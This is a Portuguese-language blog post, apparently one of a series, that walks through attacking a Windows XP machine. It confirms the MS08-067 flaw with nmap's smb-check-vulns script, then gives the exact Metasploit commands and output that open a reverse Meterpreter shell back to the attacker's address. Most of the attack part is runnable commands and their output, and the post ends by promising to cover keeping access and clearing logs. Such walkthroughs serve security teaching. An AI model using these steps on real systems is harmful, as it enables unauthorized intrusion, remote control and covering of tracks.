No post anterior mostrei um pouco sobre as funcionalidades do nmap, hoje pretendo mostrar mais uma função do nmap e dar uma pequena demonstração da utilização do metasploit.
O nmap possui desde o inicio da versão 5 um motor de scripts, isto permite automatizar certas tarefas e/ou proceder com o aumento de funcionalidades desta potente aplicação. Uma das funcionalidades adicionada ao nmap pelo motor de scripts (NSE - Nmap Script Engine) permite identificar maquinas infectadas com Conficker ( um worm recente que explora a vulnerabilidade_ MS08-067 _) bem como maquinas vulneráveis.
Como constatamos no passo anterior temos um windows XP SP2/SP3, que com a porta 445 aberta que quer dizer que provavelmente podemos abusar da vuln MS08-067 e ganhar acesso ao sistema. No entanto antes de lançar qualquer exploit vamos verificar se realmente está vulnerável esta maquina.
# nmap --script=smb-check-vulns 192.168.0.7
Starting Nmap 5.21 ( http://nmap.org ) at 2011-03-24 14:15 WET
NSE: Script Scanning completed.
Nmap scan report for 192.168.0.7
Host is up (0.0093s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open unknown
MAC Address: 08:00:27:CB:09:65 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_ SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds
Aqui podemos constatar que a maquina está vulnerável e que parece não estar infectada com o conficker. Agora que encontramos este acesso basta conseguir explorar-lo. Para isso abrimos o metasploit…
# ./msfconsole
# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 668 exploits - 345 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12121 updated today (2011.03.25)
msf >
… definir o ip do alvo e o payload juntamente com o ip da maquina que está atacar e seleccionar o exploit e finalmente lançar o ataque!
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/metsvc_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.6
LHOST => 192.168.0.6 msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Portuguese
[*] Selected Target: Windows XP SP3 Portuguese (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.0.7
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1460) at 2011-03-24 14:42:15 +0000 meterpreter >
E pronto consegui-mos acesso á maquina. No proximo post irei demostrar o que fazer depois de ter acesso a uma maquina remota, como manter o acesso e limpar os registos.